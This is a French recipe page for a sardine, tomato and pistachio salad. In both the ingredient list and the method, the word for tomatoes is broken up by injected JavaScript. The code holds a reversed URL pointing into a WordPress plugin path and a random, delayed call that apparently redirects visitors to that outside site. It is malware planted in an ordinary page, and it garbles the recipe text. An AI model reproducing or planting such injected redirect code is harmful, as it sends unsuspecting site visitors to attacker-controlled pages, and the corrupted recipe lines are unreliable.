
SALADE FOLLE DE SARDINES & PISTACHES
Pour 4 Pers.
INGRÉDIENTS
– Mélange de salades (roquette/mache par exemple)
– 2 boites de belles sardines à l’huile d’olive (garder l’huile pour la vinaigrette)
– Quelques toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates de saison de différentes tailles et couleurs
– Coriandre hachée 1 CS
– 1 poignée de pistaches
– Vinaigre de cidre (ou de vin) 1 CS
– Vinaigre balsamique blanc 1 CS
– Fleur de sel et poivre du Moulin
Préparer la vinaigrette en mélangeant 4 CS d’huile d’olive des sardines, les vinaigres et assaisonner
Mélanger dans un saladier la salade avec 2 CS d’huile des sardines et répartir dans 4 assiettes
Dresser sur la salade les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates puis les sardines, les pistaches et terminer par la vinaigrette
Servir sans attendre.
Bon appétit !
